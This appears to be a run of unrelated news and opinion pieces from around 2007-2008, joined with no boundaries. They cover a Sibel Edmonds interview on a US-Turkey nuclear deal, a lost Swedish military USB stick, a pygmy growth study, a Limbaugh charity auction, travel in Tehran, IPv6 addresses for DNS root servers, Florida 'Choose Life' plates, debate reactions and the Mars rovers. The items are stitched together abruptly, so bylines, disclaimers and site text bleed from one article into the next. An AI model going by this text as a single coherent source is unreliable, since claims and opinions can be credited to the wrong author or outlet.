Do you remember the noise made a couple of years ago when the US announced that it would supply India with nuclear technology ?
So far , nearly a week after the announcement and not a single major US media outlet has even reported on the deal !
Think of the hypocrisy , with all the saber - rattling at Iran over enrichment .
If it 's such a good idea to sell nuclear technology to Turkey , why is n't the White House out there selling the idea ?
Where are the arguments in the press saying that this will be good for regional stability , or that it will help reduce demand for oil , or even that it is simply good business because US firms will be able to sell their hardware and knowledge ?
There 's nothing !
Silence .
What does that tell you ?
Luke Ryland :
What needs to be done ?
Sibel Edmonds :
The way they 've structured this deal is that Congress has 90 days from the announcement , now 84 days , to block the ' agreement ' otherwise it basically becomes law .
The first thing that we need to do is to make sure that this does n't ' automatically ' become law .
We need the journalists , the experts , and the bloggers to raise hell over this issue , and we need to make sure that Congress investigates this properly before rubber - stamping it .
The clock is ticking and we need to act now .
As you know , and this was even published in the White House press release on this issue , certain ' Turkish private entities ' have been involved ' in certain activities directly relating to nuclear proliferation . '
This includes supplying the A.Q. Khan network - which built Pakistan 's nuclear bomb , and also supplied North Korea , Iran and other countries - but as the recent Times stories indicate , so much more as well .
The White House press release states that all these issues have been resolved ; that the Turkish government has addressed these issues , that the US government has evaluated these actions and that the US government is satisfied , and that all of this is secret , classified !
Given the track record of this administration in abusing classification and distorting intelligence , why on earth would we trust them with this ?
What is in the report ?
Is it truthful ?
Why is it classified ?
We saw these exact same people do the same thing in the late 80s when they enabled Pakistan to get nuclear weapons .
Richard Barlow did his best to stop them then , but if Congress does n't hold hearings this time around the same thing will happen again .
We should have stopped Pakistan then , but unless this ' classified ' report is made public and the contents publicly debated , then the Barlow of today wo n't even get the chance to debunk whatever is in that ' classified ' report .
What conceivable logic is there in classifying the details of how Turkey has cleaned up its act regarding nuclear proliferation ?
If they have , they should be proud of it !
There are many great anti-proliferation organizations out there , we need to rally all of them , and all of the ' pro- transparency ' organizations , to this cause .
We need journalists to contact these experts for their opinion and expertise , and we need these experts to contact journalists to ensure that the story , and the issues , is covered , and covered thoroughly .
We also need to recruit bloggers and alternative media to keep the pressure on .
Perhaps a ' countdown clock ' as we count down the 90 days might help .
Luke Ryland :
What are the next steps in the process ?
Sibel Edmonds : I 'm not exactly sure of the process at the moment , but it has been reported that this ' automatically ' becomes law after the 90 days , somehow , unless Congress blocks or amends the legislation .
Apparently the approval process somehow includes convincing the Senate Foreign Relations Committee and the House Foreign Affairs Committee not to object , so those committees appear to be our first firewall .
( Ed note : Senate Foreign Relations Committee includes Joe Biden ( Chair ) , Chris Dodd , John Kerry , Russ Feingold , Barbara Boxer , Barack Obama and Jim Webb for the Democrats , and Richard Lugar , Chuck Hagel and George Voinovich for the minority .
Hopefully one of them will stand up on this important issue .
The House side looks more difficult , the Chairman is Tom Lantos who was listed in Sibel 's Rogue 's Gallery , which apparently identifies 18 of the guilty parties in her case , so that might be a problem .
Ron Paul is also on that committee , he might be a prime target for this campaign . )
Luke Ryland :
Is there anything else we can do ?
Sibel Edmonds :
There is one other hope .
As last week 's White House press release states , Bill Clinton tried to pass this legislation in 2000 but " immediately after " Clinton tried to send it to Congress it was blocked because some people apparently highlighted Turkish involvement in the nuclear black market and , who knows , maybe threatened to blow the whistle .
Those same individuals , and others like them , can stop this again , and they should do everything they can to make sure that this does n't happen .
They should try to do it internally , and if they can't do it internally , then they need reach out to journalists , either on or off the record .
Hopefully some honest , dedicated people will try to block it again , but we can't rely on that .
We need to pressure congress to ensure that this does n't go through .
Time is running out , the countdown clock is ticking down , and we need to stop this now .
We need the help of journalists , congress , nuclear proliferation experts , bloggers and those active citizens in the blogosphere and elsewhere .
--------------
Many thanks to Sibel , as always .
Please do what you can to help block this proposed legislation .
If you can create a ' countdown clock ' please contact me , and we 'll offer it so that everyone can place it on their blogs and use it in their sigs etc .
-------------
Regarding alternative media , Sibel is particularly grateful to American Conservative and Antiwar.com for their objectivity and non-partisanship in covering this case .
In particular , Phil Giraldi , Justin Raimondo , Joshua Franks and Scott Horton .
To reiterate Sibel 's emphasis on the importance of the internet to help get the story out , Daily Kos statistics for the week Jan 19 - 25 have been released .
During a primary week when many were ( rightly ) complaining that campaign diaries made it almost impossible for other issues to get any attention , diaries related to Sibel 's case dominated the list .
Sibel 's story was both # 1 and $ 2 for the week , and filled 3 of the top 11 , and 4 of the top 25 diaries .
Statistics at Democratic Underground will demonstrate the same level of interest in the case .
Thank you to all of you , and I ask that you continue to support the case , and I ask that journalists and bloggers pick up the story and support the great work done by the Times .
It 's about time , no ?
--------------
Cross-posted at Let Sibel Edmonds Speak ( Email me if you want to be added to my Sibel email list .
Subject : ' Sibel email list ' )
Luke Ryland Social Media Pages :
Luke Ryland is a blogger with a particular interest in Sibel Edmonds ' case .
The views expressed herein are the sole responsibility of the author and do not necessarily reflect those of this website or its editors .
OpEdNews depends upon can't survive without your help .
If you value this article and the work of OpEdNews , please either Donate or Purchase a premium membership .
Oops :
The daily newspaper , Aftonbladet , turned the stick over to the Armed Forces on Thursday .
The paper ’s editorial office obtained the memory stick from an individual who discovered it in a public computer center in Stockholm .
An employee of the Armed Forces has reported that the misplaced USB memory stick belongs to him .
The employee contacted his superior on Friday and divulged that he had forgotten the memory stick in a public computer .
A preliminary technical investigation confirms that the stick belongs to the employee .
The stick contained both unclassified and classified information such as information regarding IED and mine threats in Afghanistan .
Pygmies , the most well - known group of diminutive humans , whose men on average grow to a maximum of five feet tall and their women about a half foot shorter , were thought to be endowed with their characteristic small body sizes due to poor nutrition and environmental conditions .
But the theories did not hold up , given that these populations — primarily hunter–gatherers — are found mostly in Africa but also in Southeast Asia and central South America , and thereby are exposed to varying climates and diets .
Further , other populations who live under conditions of low sustenance , such as Kenya 's Masai tribes , are among the world 's tallest people .
So what could account for these pockets of people who grow so small ?
According to University of Cambridge researchers , the key is the pygmies ' life expectancy .
" After going to the Philippines and interviewing the pygmies , I noticed this very distinctive feature of the population : very high mortality rates , " says Andrea Migliano , a research fellow at Cambridge 's Leverhulme Center for Human Evolutionary Studies and co-author of a new study published in Proceedings of the National Academy of Sciences USA .
" Then , going back to life history theory , we noticed that their small body size was really linked to high mortality . "
Migliano and her colleagues began their study by comparing the growth rates of two Filipino pygmy groups ( the Aeta and the Batak ) with data from African pygmies as well as from East African pastoralist ( livestock - raising ) tribes like the Masai and the lower echelon of the U.S. growth distribution ( in essence , malnourished Americans ) .
All these groups have low nutritional status but reach significantly different average height levels .
The U.S. population showed the greatest growth rate , whereas both the pygmies and African pastoralists lagged behind .
Although the pygmies plateaued around 13 years of age , the pastoralists kept growing , reaching their cessation point into their early twenties .
Because the pygmy growth rate approximated the taller pastoralists , but had an earlier end point , the researchers concluded that their growth was not nutritionally stunted .
The group next examined the incredibly low life expectancy of different pygmy populations , ranging from roughly 16 to 24 years of age .
( Pastoralists and other hunter–gatherer populations experience expectancies that are nearly one to two decades longer — a number that is still low , especially when compared with the 75 - to 80 - year life span expected of Americans . )
Pygmies also reach their age of last reproduction a few years earlier than their taller counterparts , although there are many more pastoralist women than pygmies who reach this age at all .
Looking at fertility curves , the researchers noted Aeta appeared to reproduce on average when they were around 15 or 16 years old , which is about three years earlier than other hunter–gatherers .
The tallest of these populations actually appeared to reproduce the latest .
By having an early onset of reproductive abilities , the scientists say , the pygmies appear to trade off time spent growing , allowing them to continue on in the face of low life expectancy .
" Although the challenges posed by thermoregulation , locomotion in dense forests , exposure to tropical diseases , and poor nutrition do not account for the characteristics of all pygmy populations , " the authors wrote , " they may jointly or partially contribute to the similarly high mortality rates in unrelated pygmy populations . "
This research centered around women , but Migliano expects an analysis of males to mirror that of females , partly because the fertility of one would affect the other .
Further , life history theory is anchored to the female because of the importance of reproduction as a variable .
She adds that this paradigm could be used to help better understand the evolution of Homo floresiensis , the so - called " hobbit " found on the Indonesian island Flores in 2003 .
" I think there is a great potential to use the theory to understand changes in body size during hominid evolution , such as the size of the hobbits and the relatively larger size of erectus , " Migliano says .
" But my main objective is to apply the theory to the understanding of the current human diversity . "
I remember graduating from college and having that feeling in the pit of my stomach “ Damn , now what ? ”
Well , if you ’re into clean energy , you may have some good prospects .
Renewable energy businesses are booming , but they ’re competing quite intensely for talented people .
Writing for Renewable Energy Access , Dawn Dzurilla noted that the “ triple bottom line ” of People , Planet , and Profit are motivating job seekers to enter the industry .
Its rapid growth and challenging opportunities are keeping people in this cutting - edge career .
There are several colleges and universities around the country offering cleantech - related programs , like wind turbine maintenance .
The University of Oregon has become the first in the U.S. to offer a course in renewable energy law .
It ’s a part of its sustainable business certificate program to train students for careers in environmentally friendly industries .
The state has identified cleantech and renewable energy as “ vital ” to the economic development of the state , so it ’s taking steps to train its workforce in that field .
KTVZ.com ( Portland , OR )
Renewable Energy Access
Winning Rush bidder also gave money to Obama campaign Jason Rhyne
Published : Friday October 19 , 2007
del.icio.us
Print This Email This
The winner of an online auction organized by conservative radio host Rush Limbaugh ponied up $ 2,100,100 for charity today in order to acquire the original copy of a complaint letter from Senate Democrats -- but the reportedly loyal Limbaugh listener also has a sweet spot for Barack Obama .
According to the donation search engine NewsMeat , top bidder Betty Casey , a noted Washington D.C. - area philanthropist , has given a total of $ 4,600 dollars to Sen .
Obama 's presidential campaign , the maximum amount allowed by law .
Other donations noted , however , are for Republicans , including several sizable gifts to the Republican Senatorial Committee .
Casey 's prize today is an Oct. 2 letter co-signed by Senate Majority Leader Harry Reid and 40 other Democratic senators in which the lawmakers blasted what they viewed as Limbaugh 's use of the phrase " phony soldiers " to condemn soldiers critical of the war in Iraq .
It will be delivered in a Haliburton brief case and accompanied by an autographed photograph of Limbaugh .
The letter was originally intended for the CEO of the Clear Channel Corporation , which broadcasts Limbaugh 's program , and demanded an apology for the host 's remarks .
But Limbaugh acquired the letter and posted it on the popular auction site eBay this week .
The entirety of Casey 's bid will benefit the Marine Corps - Law Enforcement Foundation , a scholarship assistance program for the children of Marine and Federal law enforcement personnel who are killed in the line of duty .
The amount of the winning bid has reportedly set the record for a charity donation on eBay , bringing more than double that of the former title - holding item , a Jay Leno motorcycle .
Additionally , Limbaugh has pledged to match the amount , which would bring the total donation to more than $ 4 million .
Casey , a leading supporter of the Washington National Opera and an array of other charitable causes , is the widow of Eugene B. Casey , a former farm policy advisor to President Franklin Roosevelt .
The bidding history of the auction shows that Casey came over the top of two other bidders -- who pushed the top amount offered from $ 850,000 to $ 2,000,000 over the course of a day .
The auction has already drawn the attention of Sen. Harry Reid , who commented from the Senate floor today the eBay sale had " very , very constructively " left the money to charity , and that although he and Limbaugh " do n't agree on everything in life , " that he applauded the effort .
" Never did we think that this letter would bring money of this nature , " Reid said .
" A letter written by Democratic Senators complaining about something . "
A campaign spokesman for Sen. Obama did not immediately respond to a RAW STORY request for comment .
Advertisements
Want a gift card ?
Participate in a presidential frontrunner survey !
Imam Khomeini International in Tehran looks much like any big new airport , except that its long corridors bear posters declaring this the Year of National Unity and Islamic Solidarity , rather than ads for lipstick and perfume .
Still , it does not take long for an American passport - holder to meet with deeper differences .
The immigration officers are polite , a little embarrassed , even , as they recall that you will have to be fingerprinted .
An exchange of shrugs quickly establishes a degree of complicity .
We will all , a few tired US passengers and bored Iranian officials , have to act out a tiresome ritual dictated by diplomatic tit - for - tat .
But Americans are pretty rare here .
A dozen flights arrive and depart before the correct forms can be found , along with a stapler to attach them together , a pen to fill them in , the key to a room where there might be an ink pad , and so on .
When the sticky job is done , an officer helpfully flourishes a Kleenex to wipe away the deep purple stains .
Outside , a first flush of daylight silhouettes distant mountains .
We follow signs for Tehran rather than Qom and faraway Isfahan , and merge into the six - lane Persian Gulf Expressway .
The taxi driver pops in a cassette .
His favorite , he says , humming along .
Dire Straits is the band , and as their emphatic , twangy chords bring back memories of other wide - open highways , it dawns that this song , “ Sultans of Swing , ” dates to 1978 , when the Islamic Revolution was nearing its climax .
Past a toll station and off to the east , via an exit ramp , rise four soaring floodlit spires .
Minarets !
This is the tomb of Ayatollah Khomeini , under whose rule pop music was banned .
That weekend I cross Tehran again to visit the tomb , thinking to see it on a traffic - free day , because the rest of the week , traffic is hellish in this hyper - urban mass of perhaps sixteen million people .
But on the day I make my attempt the government has decided to celebrate the martyrdom of sixty soldiers from the 1980 – 1988 Iran–Iraq war whose bodies have recently been recovered .
( This is a macabre benefit of America ’s invasion of neighboring Iraq : gangs around Basra , where there was bitter fighting back then , have built a lucrative trade supplying supposed remains of Iranian soldiers . )
The downtown ceremony , attended by President Mahmoud Ahmadinejad himself and busloads of black - shirted Basijis , or paramilitary volunteers , creates a massive traffic jam .
At last we reach Khomeini ’s shrine .
Its reinforced concrete dome and minarets stand beyond a big parking lot at the edge of the vast Beshesht - e - Zahra cemetery , where some 300,000 martyrs from what is officially titled the Iraq - Instigated War lie .
A giant billboard at the cemetery ’s entrance shows the beatific face of a bearded young hero , haloed by purple tulips , with touches of blood on his forehead and sleeping - prince lips .
But the mood here is more festive than somber , with families spreading picnics on the lawns , and clusters of friends chatting as they pass through the gender - separate entrances to Khomeini’s …
( CNN ) --
" I will never vote for anyone for the president of the United States who supports abortion or gay marriage . "
Roland S. Martin :
There 's a possibility the GOP presidential nominee may back gay and abortion rights .
Those were the words spoken to me three years ago by a prominent pastor in the Dallas - Fort Worth area who has led a number of rallies on those two issues .
But the Rev. Pat Robertson 's endorsement of former New York Mayor Rudy Giuliani puts front and center the day conservative evangelicals have said we would never see : a possible Republican presidential nominee who has been supportive of gays and abortion rights .
On CNN's " Anderson Cooper 360 , " conservative commentator and CNN contributor Bill Bennett and CNN senior political analyst Gloria Borger said they did n't anticipate the Christian Coalition founder making such an audacious move by backing Giuliani .
But I was n't surprised .
Why ?
Because the late Rev. Jerry Falwell signaled such a move was possible during a CNN special I hosted in April called " What Would Jesus Really Do ? "
When I asked Falwell if there was a litmus test on abortion and homosexuality for the Republican nominee , Falwell said the most important issue of the day was national security , and he would prefer someone who has experience in that area rather than a Sunday school teacher .
Had Falwell not died , it would not have shocked me to see him standing next to Giuliani and speaking of absolving people of sin , encouraging them to admit their mistakes and put the greater good of the nation before their principles .
Evangelicals cursed and screamed when President Clinton had an affair in the White House , but it 's clear they are willing to overlook the past marital failures of Giuliani , his fractured relationship with his children and his support for gay and abortion rights when mayor of New York .
Those are not the family values they have beaten into the nation 's consciousness for nearly 30 years .
This is n't the Rapture when Christians say Jesus will return to Earth , but it is the day of reckoning for conservative evangelicals .
Will they abide by their faith and absolute opposition to abortion and homosexuality being first and foremost , or bend to the will of the party ?
For years I have maintained that the focus of evangelicals was never really principles of the faith but the Republican Party .
By aligning themselves with the GOP , they 've put themselves in this position .
And with 25 percent of the party 's base being evangelicals , this is going to cause some serious problems .
As for a possible third - party candidate , as suggested by Tony Perkins , president of the Family Research Council , that 's not going to happen .
Remember 1992 ?
The barrage of attacks from Ross Perot against President George H.W. Bush allowed Clinton to stay above the fray and focus on his agenda .
Clinton garnered 43 percent of the vote compared with Bush 's 37.4 percent and Perot 's 18.9 percent .
Even a movement of 10 percent could spell doom for Giuliani if he becomes the nominee .
Democrats are still mad at Ralph Nader , suggesting that his 2.74 percent of the popular vote in 2000 pulled away critical support in some states and led to Bush 's victory .
Sure , there will be some evangelicals who will be so adamant that they wo n't support Giuliani , but the vast majority likely will fall in line because of what Robertson said -- that the candidate has assured the American people his choices for judicial appointments will be men and women who share the judicial philosophy of Chief Justice John Roberts .
That 's code to the base that Giuliani wo n't be a Hillary Clinton .
The idea of the senator from New York , if she is able to win the presidency , appointing federal judges is too much for them to bear .
And with conservatives on the cusp of having a majority on the U.S. Supreme Court , and the next president likely appointing three justices , evangelicals will hold their noses and eat their words .
So I guess in the end , instead of allowing God to lead them in their choice for the nominee , they 'll just pray to the Lord that Giuliani keeps his word .
Talk about a test of faith .
Roland S. Martin is a nationally award - winning journalist and CNN contributor .
Martin is studying to receive his master 's degree in Christian communications at Louisiana Baptist University , and he is the author of " Listening to the Spirit Within : 50 Perspectives on Faith . "
You can read more of his columns at http://www.rolandsmartin.com/.
The opinions expressed in this commentary are solely those of the writer .
E-mail to a friend
All About Pat Robertson • Rudolph Giuliani
Just before year 's end , ICANN / IANA sent out a short message saying that " on 4 February 2008 , IANA will add AAAA records for the IP v6 addresses of the four root servers whose operators have requested it . "
The Internet Corporation for Assigned Names and Numbers ( ICANN ) is mostly responsible for the global Domain Name System , the Internet Assigned Numbers Authority ( IANA ) is the part of ICANN .
That means that as of February 4 , 2008 , it will ( theoretically ) be possible for two IPv6 hosts to communicate across the IPv6 Internet without having to rely on any IP v4 infrastructure .
It 's been a long journey to get to this point .
Although there were some false starts ( see this book chapter about IPv6 and the DNS ) , putting IP v6 information in the DNS has been routine for many years .
For instance .
Dutch ISP BIT at www.bit.nl is reachable over IPv6 , and the root servers know the IPv6 addresses of the .nl servers , which in turn know the IP v6 addresses of the BIT DNS servers .
So the only thing that prevents IPv6 - users from reaching BIT , should anyone be careless enough to unplug the IPv4 Internet , is the fact that the root DNS servers are only listed by their IP v4 address .
When a DNS server starts up , it has to find the root servers that sit at the top of the name delegation chain .
For this purpose , a DNS server keeps a local hints file , named .root , ( or named .
cache or named.ca , found in / var / named / on many systems ) that has the names and addresses for all the root servers .
However , system administrators do n't always keep this file up to date , so the first thing that a DNS server does upon startup is ask for an up - to - date list of root servers .
So as long as there is still a single correct root server address in that named .
root file , everything will work .
The trouble is that the original Domain Name System specification only allows for 512 - byte packets in the DNS protocol .
With 13 root servers , we 're already well over 400 bytes .
Any useful number of IP v6 addresses for root servers would push this beyond the 512 - byte limit .
So for a long time , the parties involved have considered the possibilities of ill effects when IPv6 addresses for the root DNS servers are added to " the dot . "
( A dot signifies the end of a DNS name .
A dot without a name is therefore the root of the DNS hierarchy . )
The message from IANA links to a lengthy report , written by ICANN 's Security and Stability Advisory and Root Server System Advisory Committees , detailing all the possible issues that could come up .
The majority of modern DNS software is capable of sending and receiving packets larger than 512 bytes , so anyone running these should be fine .
If a DNS server does n't indicate this capability in its request , the root server will fit as much as it can within a 512 - byte packet and mark the answer as " truncated , " which is the requester 's cue to retry the request over TCP rather than the usual UDP .
So older DNS software should n't have any problems , either , so long as firewalls do n't block DNS packets larger than 512 bytes or DNS requests over TCP .
If you run a resolving DNS server ( that does n't include a DNS server in a home router ) , this is something you may want to check with your firewall administrator / vendor before February 4 .
If you run really old DNS software , this might be a good time to upgrade .
However , if it 's well - behaved , you should n't have any problems as long as you do n't download the new named .
root file with IP v6 addresses in it that will no doubt show up on the IANA web site in the next few weeks .
In the binary DNS protocol , the unknown information is of a known size and can be ignored by older software , but IP v6 addresses in a text file can only be parsed by software that is IP v6 - aware .
Nothing can describe many alleged “ pro-life ” programs better than the phrase about the road to hell being paved with good intentions .
How ironic that those concerned about the lives of unborn fetuses could create programs which in fact act to destroy families , the cornerstone of civilization .
Take for instance , the state of Florida ’s “ Choose Life ” license plate fund established by a group of Marion County residents who wanted to encourage women to choose life over abortion .
A benign enough sounding cause – saving lives - until you look into the major anti-family strings attached to it :
Funds raised through the sale of the license plates are used to support pregnant women who plan to continue their pregnancies , based on financial need , but with a big string attached .
Women who do not abort an unplanned pregnancy , but choose life and desire to raise their own children , are denied help from the program .
The funds can ONLY be given to those who choose life and relinquish their beloved babies for adoption , usually by non-related strangers .
In other words , the state fund is used not to save babies and support mothers and families in crisis , but to increase the supply of babies available for a very lucrative adoption industry estimated at $ 2 - 3 billion dollars a year .
If the goal were truly to save the life of an unborn from being aborted , why apply a restrictive condition that creates lifelong grief ?
Last year , the seventh year of the program , the plates were the biggest seller among Florida ’s 104 specialty tags , with 41,051 sales – at $ 22 each ( $ 19 for renewal ) .
Statewide last year , counties spent nearly $ 200,000 less than they took in , and they had three times more money in reserves than they did in expenditures .
The cruel anti-family design of this program , would rather have money sit unused than use it to help struggling families who chose not to abort and may need assistance to remain together .
Well - intentioned pro-life supporters are naively unaware of the connection between the religious right and the multi-billion dollar a year national adoption industry .
Babies are a huge , money - making commodity and the ties are closely intertwined between the National Council for Adoption — the largest lobbying organization of adoption agencies , primarily those of the Later Day Saints — and Evangelical Christians organizations such as Focus on the Family who held a three - day summit in Colorado in May , 2007 to promote adoption .
Programs such as this Florida license plate program which offer funds to expectant mothers allegedly to save the life of their unborn — but which hold out discriminatory caveats — need to seen for what they are : a mean - spirited attack on the family and a violation of the separation of church and state .
Religious beliefs are being used to discriminate against and deconstruct families in need and supply babies for adoption .
This is sinful , immoral and a violation of the constitutional right to parent .
( CNN ) -- Republican presidential candidates traded plenty of jabs during Wednesday night 's CNN / YouTube debate .
CNN.com viewers analyzed their answers for substance and truth and pointed out where candidates gave stellar responses or left their audience asking more questions .
Below is a collection of their responses , some of which have been edited for length and clarity .
Paul Schlimme , pictured here with Ron Paul on November 10 , likes the format of the CNN - YouTube debates .
Nancy Kolger of Richmond , Indiana
I am a 67 - year - old widow .
I am clearly disappointed about the questions chosen tonight for the candidates to answer .
As a senior citizen I am really disappointed that not one question was asked about health care and rising drug costs for all the people .
I can send you an e-mail response and / or question but I do not know how to take or send a video or download and all that other stuff that younger people do .
So therefore I was not given the chance to ask a question and I feel this is a form of discrimination or else lack of CNN taking the time to scan through e-mails as they have obviously done with videos .
Next time I hope you will consider the fact that a lot of the citizens / voters of this country do not know how to use all this modern stuff and it would be nice if you just had a senior citizen debate with the candidates ; and I bet some really good questions besides , wars , gun control , immigration , abortion , gays , etc , would come forth .
Like health care , drug expenses , gas prices , feeding , clothing , and housing the elderly , more American jobs , etc .
Thank you !
Anonymous from Washington
I am a lieutenant in the U.S. Army .
I served as a platoon leader , and am now working at the battalion level and am about to make the rank of captain .
I ask that you not use my name because I am active duty .
In response to the candidates ' remarks on gays in the military , not a single one will get my vote .
Sen .
McCain said he has talked to the leaders in the Army , the generals .
These are not the people to talk to on this issue ; the people to talk to are the lieutenants , the captains and the sergeants .
They are the ones who serve with these soldiers .
They are the ones who see how these soldiers serve .
Openly gay soldiers should not be discriminated against .
They do not damage morale ; they do not damage the ability of a unit to fight .
Years ago , the ability of women to fight was questioned , yet now we are in a war where there is no battle line , everywhere is the front line .
I 've lost friends both on the FOB and outside , both men AND women .
Margaret Giles of Fort Walton Beach , Florida
Although the debate has covered a lot of hot topics such as Iraq , gay marriage , immigration , abortion and such , I was a bit disappointed to see that NOT person or candidate even brought up stem cell research .
Is this not as big a deal as putting a man on Mars or fixing highway infrastructures !?
I think they could have covered more important topics like stem cell research than " Do you believe every single word of the Bible ? "
Dennis Wolcott of Vermilion , Ohio
Why do we focus on abortion , religion and gun rights when theses issues are debated every 4 years and never seem to change .
In truth , these issues are polarizing talking points that eat at people emotionally .
Please discuss real issues that matter to all of us :
Fair trade , paying down debt , trade deficits , mortgage credit crunch , etc .
Maybe someone could explain why NAFTA does not seem to be working or why our children are now being taught to pass an achievement test instead of fundamentals .
Stephen Farley of San Francisco , California
The bravery of the brigadeer general in the audience was the highlight of the evening .
Mike Lamprecht of New York , New York
Whatever happened to separation of church and state ?
I do n't think our candidates should be asked if they believe in the bible .
Religious views are private personal beliefs and should remain private .
Is n't that the basis of this country 's creation ?
Robert Semands of Edmond , Oklahoma
This is the best debate so far .
I have enjoyed the in - your - face energy from all the candidates .
The moderator , while doing a generally good job , has really short - changed Ron Paul , Tom Tancredo and Duncan Hunter .
Ron Paul is the only candidate on that stage that understands the Constitution and adequately represents it .
We all needed to hear much more from him .
Muriel Sims of Fort Worth , Texas
No he [ Mitt Romney ] did n't invoke the name of Bill Cosby !
People living in the " inner city " ( code for Black communities ) are no less moral than anyone else .
But men have a very hard time staying if they cannot work .
My stepfather was in my life , but he worked all his life too .
What man wants to sit around feeling helpless while his child cries in hunger ?
Why do you think the " inner city " father is any less sympathetic than the people who can afford to employ illegal aliens in his home ?
Frank Richmond of Wichita , Kansas
I 'm amazed to hear all these well - fed people who have never felt any pain talking about what is or is n't torture .
If you kicked in any of these candidates ' doors , dragged them out of bed naked , threw them in a cell for a few days , then tied them upside down to a board with a wet towel around their head and started hosing them down , they would think it was torture .
They might think it 's necessary on occasion , but at least be man enough to call it what it is .
Mary Tarkington of Wilsonville , Oregon
" Do you believe what the bible says ? "
PLEEEASE !
These people are running for president , not Pope !
Mike G. of Chicago , Illinois
This debate proves nothing more than the GOP is the God-centric party .
Not everyone believes that the USA should be as religiously focused as it is .
After hearing the candidates , I feel they cannot relate to my religious views , which are different than theirs .
Jeff Stevens of Peekskill , New York
As a member of the U.S. Army , it greatly offends me to hear John McCain say things like " Our troops want to finish the job . "
I have never in my few years as a young Soldier in both an active duty and reserve component heard anyone say such things .
It is a soldier 's job to be neutral and fulfill the duties that the American people task us with .
I think it is wrong to fool the American people into thinking that soldiers actually enjoy the brutal environment in Iraq and wish to stay there .
Bobby Schechinger of La Vista , Nebraska
During the immigration debate I felt that nobody really hit the true points of dealing with illegal immigrants .
It was turning into a fistfight with words and bashing their opponents ideas and saying " he 's an idiot , do n't vote for him ! "
Sarah Soltesz of Palm Harbor , Florida
When Romney replied to Giuliani about the illegal immigrants that he has employed at his mansion , he responded with " do I ask people who have an accent to see their green card ? " .
I would have replied that if he was employing them legally he would have to gather that information it states clearly on an application are you a legal US citizen ?
Can you show the correct paper ( green card ) that you are legally able to work in the US ?
As an employer you have the right to ask this of your employee .
Tim Lamb of Waynesville , Ohio
This is a stupid format .
What is next ?
Dancing with the Presidential Candidates !!
The Great Presidential Race !!
Presidential Idol !!
Give me a break .
How about a serious format ?
E-mail to a friend
A male jumping spider ( Salticidae ) is trying very very hard to excite a female jumping spider .
He taps , he scrapes , he turns and twists ... he stops !... quite funky !
Make sure you turn up the volume on your speakers ... the sounds are half the act !
NASA / JPL - Caltech / Cornell
NASA / JPL - Caltech / University of Arizona / Cornell / Ohio State University
Inch by power - conserving inch , drivers on Earth have moved the Mars rover Spirit to a spot where it has its best chance at surviving a third Martian winter -- and where it will celebrate its fourth anniversary ( in Earth years ) since bouncing down on Mars for a projected 90 - day mission in January 2004 .
Meanwhile , researchers are considering the implications of what Cornell 's Steve Squyres , principal investigator for NASA 's Mars Exploration Rover mission , calls " one of the most significant " mission discoveries to date : silica - rich deposits uncovered in May by Spirit 's lame front wheel that provide new evidence for a once - habitable environment in Gusev Crater .
Squyres and colleagues reported the silica deposits at the annual meeting of the American Geophysical Union in early December in San Francisco .
On the other side of Mars , Spirit 's still - healthy twin Opportunity is creeping slowly down the inside of Victoria Crater , where layers of exposed rock are confirming findings made at the much smaller Eagle and Endurance craters -- and where deeper layers could offer new insight into the planet 's history .
Spirit , which has been driving backward since its right front wheel stopped turning in March 2006 , was exploring near a plateau in the Gusev Crater known as Home Plate when scientists noticed that upturned soil in the wake of its dragging wheel appeared unusually bright .
Measurements by the rover 's alpha particle X - ray spectrometer and mini-thermal emission spectrometer showed the soil to be about 90 percent amorphous silica -- a substance associated with life - supporting environments on Earth .
" This is one of the most powerful pieces of evidence for formerly habitable conditions that we have found , " said Squyres , Cornell 's Goldwin Smith Professor of Planetary Science , in a Dec. 11 interview with the BBC .
On Earth , silica deposits are found at hot springs , where hot water dissolves silica in rock below the surface , then rises and cools , causing the silica to precipitate out near the surface ; and at fumaroles , where hot acidic water or vapors seep through rock , dissolving away other elements but leaving silica behind .
" Either place on Earth is teeming with microbial life , " said Squyres .
" So this is , either way , a representation of what in the past was a local habitable environment -- a little habitable niche on the surface of Mars . "
The discovery was reminiscent of Spirit 's journey to winter safety last year , when it uncovered ( and briefly got mired in ) patches of bright soil that contained high levels of sulfur -- another possible indicator of past hydrothermal activity .
Unlike last year , though , Spirit enters this Martian winter handicapped by dusty solar panels -- the result of giant dust storms in June and July .
So the rover 's power levels , which currently range between approximately 290 and 250 watt - hours ( 100 watt - hours is the amount of energy needed to light a 100 - watt bulb for one hour ; full power for the rovers is 800 - 900 watt - hours ) -- could drop to dangerous levels in the dwindling winter sunlight .
Spirit 's perch is currently at a 15 - degree tilt on the north - facing slope of the Home Plate plateau , said Jim Bell , Cornell associate professor of astronomy and leader of the mission 's Pancam color camera team .
As the sun moves lower in the Martian sky , drivers will nudge the rover to a steeper angle .
" The fact that we 've gotten to a good tilt , and we 're going to get to a better tilt , is a good sign , " said Bell .
Still , he added , any work the rover does over the winter -- collecting Pancam images of its surroundings , for example -- will be strictly low - exertion .
" Most of 2008 is going to be a quiet time for Spirit , " he said .
" It 's really about survival . "
